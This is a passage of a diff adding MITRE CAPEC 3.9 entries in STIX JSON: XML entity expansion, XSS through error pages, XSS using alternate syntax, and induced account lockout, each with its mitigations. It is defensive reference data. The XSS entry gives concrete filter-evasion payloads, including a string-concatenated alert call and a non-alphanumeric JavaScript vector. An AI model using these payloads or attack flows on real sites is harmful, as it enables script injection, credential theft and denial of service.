", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "This type of attack requires that the target must receive input but either fail to provide an upper limit for entity expansion or provide a limit that is so large that it does not preclude significant resource consumption." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "Ability to craft nested data expansion messages." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use libraries and templates that minimize unfiltered input. Use methods that limit entity expansion and throw exceptions on attempted entity expansion.", + "id": "course-of-action--7cdc228e-d1d1-40c4-b9c4-9e9f89b3df71", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-197-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0492ba63-8134-4235-a371-e1cf83184a85", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7cdc228e-d1d1-40c4-b9c4-9e9f89b3df71", + "spec_version": "2.1", + "target_ref": "attack-pattern--f36abc8a-043e-42c5-876d-a65fc0cddc1e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: For XML based data - disable altogether the 
use of inline DTD schemas when parsing XML objects. If a DTD must be used, normalize, filter and use an allowlist and parse with methods and routines that will detect entity expansion from untrusted sources.", + "id": "course-of-action--a2a17594-fbe4-4682-92b8-c64f405f7e3c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-197-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6b369dc5-7f0d-40cb-8412-64f171649546", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a2a17594-fbe4-4682-92b8-c64f405f7e3c", + "spec_version": "2.1", + "target_ref": "attack-pattern--f36abc8a-043e-42c5-876d-a65fc0cddc1e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary distributes a link (or possibly some other query structure) with a request to a third party web server that is malformed and also contains a block of exploit code in order to have the exploit become live code in the resulting error page.", + "external_references": [ + { + "external_id": "CAPEC-198", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/198.html" + }, + { + "external_id": "CWE-81", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/81.html" + } + ], + "id": "attack-pattern--0e2bf24b-2931-45aa-a0e9-22eccfb310b2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "XSS Targeting Error Pages", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + 
"spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--61b17787-fe92-427c-9e6a-6311997d7b2a", + "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f", + "attack-pattern--b1eef783-daae-494c-a418-cd9ada7cbe8b" + ], + "x_capec_domains": [ + "Software", + "Software", + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs as URL parameters: Using a browser or an automated tool, an adversary follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application, looking for URLs which use parameters.

  2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. Cause application to return error page: The adversary uses the URLs gathered in the \"Explore\" phase as a target list and injects various common script payloads and special characters into the parameters to see if an error page occurs, and if the injected payload is executed by the error page.

  2. Techniques
    Use a list of XSS probe strings to inject script in parameters of known URLs. If possible, the probe strings contain a unique identifier.
    Use a proxy tool to record results of manual input of XSS probes in known URLs.
    Use a list of HTML special characters to inject into parameters of known URLs and check if they caused errors
  3. Craft malicious XSS URL: Once the adversary has determined which parameters are vulnerable to XSS through an error page, they will craft a malicious URL containing the XSS exploit. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from the victim.

  4. Techniques
    Change a URL parameter to include a malicious script tag.
    Send information gathered from the malicious script to a remote endpoint.

Exploit

  1. Get victim to click URL: In order for the attack to be successful, the victim needs to access the malicious URL.

  2. Techniques
    Send a phishing email to the victim containing the malicious URL. This can be hidden in a hyperlink as to not show the full URL, which might draw suspicion.
    Put the malicious URL on a public forum, where many victims might accidentally click the link.
", + "x_capec_extended_description": "\n When the third party web server receives the crafted request and notes the error it then creates an error message that echoes the malformed message, including the exploit. Doing this converts the exploit portion of the message into to valid language elements that are executed by the viewing browser. When a victim executes the query provided by the adversary the infected error message is returned including the exploit code which then runs in the victim's browser. XSS can result in execution of code as well as data leakage (e.g. session cookies can be sent to the attacker). This type of attack is especially dangerous since the exploit appears to come from the third party web server, who the victim may trust and hence be more vulnerable to deception.\n ", + "x_capec_prerequisites": [ + "A third party web server which fails to adequately sanitize messages sent in error pages.", + "The victim must be made to execute a query crafted by the adversary which results in the infected error report." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." 
+ ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use libraries and templates that minimize unfiltered input.", + "id": "course-of-action--89b4089f-8b0c-4e66-9b1b-8d05f8cbaaf5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-198-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6ead6205-dacb-49ab-9007-3a8d39a3ea50", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--89b4089f-8b0c-4e66-9b1b-8d05f8cbaaf5", + "spec_version": "2.1", + "target_ref": "attack-pattern--0e2bf24b-2931-45aa-a0e9-22eccfb310b2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Normalize, filter and use an allowlist for any input that will be used in error messages.", + "id": "course-of-action--c79cd2c1-58af-4951-8d6a-8767190e4ecd", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-198-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d30e714c-2b9c-4a0d-95e1-7bf38e3f7c5e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c79cd2c1-58af-4951-8d6a-8767190e4ecd", + "spec_version": "2.1", + "target_ref": "attack-pattern--0e2bf24b-2931-45aa-a0e9-22eccfb310b2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: The victim should configure the browser to minimize active content from untrusted sources.", + "id": "course-of-action--7a8e75aa-0acc-4307-99ae-181fbe26a03d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-198-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--201dd0ea-a13e-4039-a9c2-1b28e26c2560", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7a8e75aa-0acc-4307-99ae-181fbe26a03d", + "spec_version": "2.1", + "target_ref": "attack-pattern--0e2bf24b-2931-45aa-a0e9-22eccfb310b2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses alternate forms of keywords or commands that result in the same action as the primary form but which may not be caught by filters. For example, many keywords are processed in a case insensitive manner. 
If the site's web filtering algorithm does not convert all tags into a consistent case before the comparison with forbidden keywords it is possible to bypass filters (e.g., incomplete black lists) by using an alternate case structure. For example, the \"script\" tag using the alternate forms of \"Script\" or \"ScRiPt\" may bypass filters where \"script\" is the only form tested. Other variants using different syntax representations are also possible as well as using pollution meta-characters or entities that are eventually ignored by the rendering engine. The attack can result in the execution of otherwise prohibited functionality.", + "external_references": [ + { + "external_id": "CAPEC-199", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/199.html" + }, + { + "external_id": "CWE-87", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/87.html" + }, + { + "description": "OWASP Cheatsheets, The Open Web Application Security Project (OWASP)", + "external_id": "REF-69", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/www-community/xss-filter-evasion-cheatsheet" + }, + { + "description": "OWASP Testing Guide (v2), The Open Web Application Security Project (OWASP)", + "external_id": "REF-70", + "source_name": "reference_from_CAPEC", + "url": "http://www.owasp.org/index.php/Testing_for_Cross_site_scripting" + }, + { + "description": "Non-alphanumeric XSS cheat sheet", + "external_id": "REF-71", + "source_name": "reference_from_CAPEC", + "url": "http://sla.ckers.org/forum/read.php?24,28687" + }, + { + "description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "external_id": "REF-72", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/Cross-Site+Scripting" + } + ], + "id": "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "modified": "2022-09-29T00:00:00.000Z", + "name": "XSS Using Alternate Syntax", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--61b17787-fe92-427c-9e6a-6311997d7b2a", + "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f", + "attack-pattern--b1eef783-daae-494c-a418-cd9ada7cbe8b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software", + "Software", + "Software" + ], + "x_capec_example_instances": [ + "\n In this example, the adversary tries to get executed by the victim's browser. The target application employs regular expressions to make sure no script is being passed through the application to the web page; such a regular expression could be ((?i)script), and the application would replace all matches by this regex by the empty string. An adversary will then create a special payload to bypass this filter:\n alert(1)\n when the applications gets this input string, it will replace all \"script\" (case insensitive) by the empty string and the resulting input will be the desired vector by the adversary:\n \n In this example, we assume that the application needs to write a particular string in a client-side JavaScript context (e.g., ). For the adversary to execute the same payload as in the previous example, they would need to send alert(1) if there was no filtering. The application makes use of the following regular expression as filter\n ((\\w+)\\s*\\(.*\\)|alert|eval|function|document)\n and replaces all matches by the empty string. 
For example each occurrence of alert(), eval(), foo() or even the string \"alert\" would be stripped. An adversary will then create a special payload to bypass this filter:\n this['al' + 'ert'](1)\n when the applications gets this input string, it won't replace anything and this piece of JavaScript has exactly the same runtime meaning as alert(1). The adversary could also have used non-alphanumeric XSS vectors to bypass the filter; for example,\n ($=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!''+$)[_/_]+$_[+$])])()[__[_/_]+__[_+~$]+$_[_]+$$](_/_)\n would be executed by the JavaScript engine like alert(1) is.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser or an automated tool, an adversary follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.

  2. Techniques
    Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.
    Use a browser to manually explore the website and analyze how it is constructed. Many browser's plugins are available to facilitate the analysis or automate the URL discovery.

Experiment

  1. Probe identified potential entry points for XSS vulnerability: Possibly using an automated tool, an adversary requests variations on the inputs they surveyed before using alternate syntax. These inputs are designed to bypass incomplete filtering (e.g., incomplete HTML encoding etc.) and try many variations of characters injection that would enable the XSS payload. They record all the responses from the server that include unmodified versions of their script.

  2. Techniques
    Use a list of XSS probe strings to inject in parameters of known URLs. If possible, the probe strings contain a unique identifier. Attempt numerous variations based on form, format, syntax & encoding.
    Use a proxy tool to record results of manual input of XSS probes in known URLs.
  3. Craft malicious XSS URL: Once the adversary has determined which parameters are vulnerable to XSS, they will craft a malicious URL containing the XSS exploit. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from the victim.

  4. Techniques
    Change a URL parameter to include a malicious script tag created using alternate syntax to bypass filters.
    Send information gathered from the malicious script to a remote endpoint.

Exploit

  1. Get victim to click URL: In order for the attack to be successful, the victim needs to access the malicious URL.

  2. Techniques
    Send a phishing email to the victim containing the malicious URL. This can be hidden in a hyperlink as to not show the full URL, which might draw suspicion.
    Put the malicious URL on a public forum, where many victims might accidentally click the link.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Target client software must allow scripting such as JavaScript." + ], + "x_capec_resources_required": [ + "Ability to send HTTP request to a web application." + ], + "x_capec_skills_required": { + "High": "To bypass non trivial filters in the application", + "Low": "To inject the malicious payload in a web page" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use browser technologies that do not allow client side scripting.", + "id": "course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-199-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7f9249a2-6d3a-425e-9583-820baa614887", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c", + "spec_version": "2.1", + "target_ref": "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Utilize strict type, character, and encoding enforcement", + "id": "course-of-action--040cd51a-446a-4612-a9d0-4a90119d5191", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-199-1", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5b5fa953-0ec5-48c2-b9a3-ea2461650cf6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--040cd51a-446a-4612-a9d0-4a90119d5191", + "spec_version": "2.1", + "target_ref": "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Ensure all content that is delivered to client is sanitized against an acceptable content specification.", + "id": "course-of-action--e9836d98-9116-4902-ba62-2c4fcc7e03c3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-199-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8bcece01-19c2-465b-9658-461bae9bfd35", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9836d98-9116-4902-ba62-2c4fcc7e03c3", + "spec_version": "2.1", + "target_ref": "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + 
"description": "Implementation: Ensure all content coming from the client is using the same encoding; if not, the server-side application must canonicalize the data before applying any filtering.", + "id": "course-of-action--63ed5cb5-5feb-4677-8623-3c5552f796ee", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-199-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8be86371-e989-4042-af5b-bfd78a42085f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--63ed5cb5-5feb-4677-8623-3c5552f796ee", + "spec_version": "2.1", + "target_ref": "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b307ad0c-ae60-4f03-a5fb-26f4499dc18d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--26850710-b983-423b-962a-5fd4b550fa0e", + "spec_version": "2.1", + "target_ref": "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Perform output validation for all remote content.", + "id": "course-of-action--4f20a4a7-cb6a-477b-a12a-13c5e9d03353", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-199-5", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ba695a24-c9fb-4c8a-9012-dc3b1068ec38", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f20a4a7-cb6a-477b-a12a-13c5e9d03353", + "spec_version": "2.1", + "target_ref": "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Disable scripting languages such as JavaScript in browser", + "id": "course-of-action--f31f11cb-6403-4667-bf43-d77242ac7ae2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-199-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1488d37a-9c10-49ea-bce3-d8270b3b9d2f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f31f11cb-6403-4667-bf43-d77242ac7ae2", + "spec_version": "2.1", + "target_ref": "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": 
"Implementation: Patching software. There are many attack vectors for XSS on the client side and the server side. Many vulnerabilities are fixed in service packs for browser, web servers, and plug in technologies, staying current on patch release that deal with XSS countermeasures mitigates this.", + "id": "course-of-action--fd1a110f-6520-479b-9f42-9c88acdbf90e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-199-7", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b3584936-9e95-48a5-bcca-77b2c2f44e5a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fd1a110f-6520-479b-9f42-9c88acdbf90e", + "spec_version": "2.1", + "target_ref": "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker leverages the security functionality of the system aimed at thwarting potential attacks to launch a denial of service attack against a legitimate system user. Many systems, for instance, implement a password throttling mechanism that locks an account after a certain number of incorrect log in attempts. An attacker can leverage this throttling mechanism to lock a legitimate user out of their own account. 
The weakness that is being leveraged by an attacker is the very security feature that has been put in place to counteract attacks.", + "external_references": [ + { + "external_id": "CAPEC-2", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/2.html" + }, + { + "external_id": "CWE-645", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/645.html" + }, + { + "description": "Account Access Removal", + "external_id": "T1531", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1531" + } + ], + "id": "attack-pattern--4ee9fc30-e736-4f4f-b55b-8a3008214042", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Inducing Account Lockout", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption (Denial of Service)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A famous example of this type an attack is the eBay attack. eBay always displays the user id of the highest bidder. In the final minutes of the auction, one of the bidders could try to log in as the highest bidder three times. After three incorrect log in attempts, eBay password throttling would kick in and lock out the highest bidder's account for some time. An attacker could then make their own bid and their victim would not have a chance to place the counter bid because they would be locked out. Thus an attacker could win the auction." + ], + "x_capec_execution_flow": "

Execution Flow

Experiment

  1. Investigate account lockout behavior of system: Investigate the security features present in the system that may trigger an account lockout

  2. Techniques
    Analyze system documentation to find list of events that could potentially cause account lockout
    Obtain user account in system and attempt to lock it out by sending malformed or incorrect data repeatedly
    Determine another user's login ID, and attempt to brute force the password (or other credentials) for it a predetermined number of times, or until the system provides an indication that the account is locked out.
  3. Obtain list of user accounts to lock out: Generate a list of valid user accounts to lock out

  4. Techniques
    Obtain list of authorized users using another attack pattern, such as SQL Injection.
    Attempt to create accounts if possible; system should indicate if a user ID is already taken.
    Attempt to brute force user IDs if system reveals whether a given user ID is valid or not upon failed login attempts.

Exploit

  1. Lock Out Accounts: Perform lockout procedure for all accounts that the attacker wants to lock out.

  2. Techniques
    For each user ID to be locked out, perform the lockout procedure discovered in the first step.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The system has a lockout mechanism.", + "An attacker must be able to reproduce behavior that would result in an account being locked." + ], + "x_capec_resources_required": [ + "Computer with access to the login portion of the target system" + ], + "x_capec_skills_required": { + "Low": "No programming skills or computer knowledge is needed. An attacker can easily use this attack pattern following the Execution Flow above." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement intelligent password throttling mechanisms such as those which take IP address into account, in addition to the login name.", + "id": "course-of-action--5d9b587f-481e-494f-a547-92de65b44c0a", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-2-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--42e9e6ff-2250-40b7-b5c7-26510e85245f", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5d9b587f-481e-494f-a547-92de65b44c0a", + "spec_version": "2.1", + "target_ref": "attack-pattern--4ee9fc30-e736-4f4f-b55b-8a3008214042", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "When implementing security features, consider how they can be misused and made to turn on 
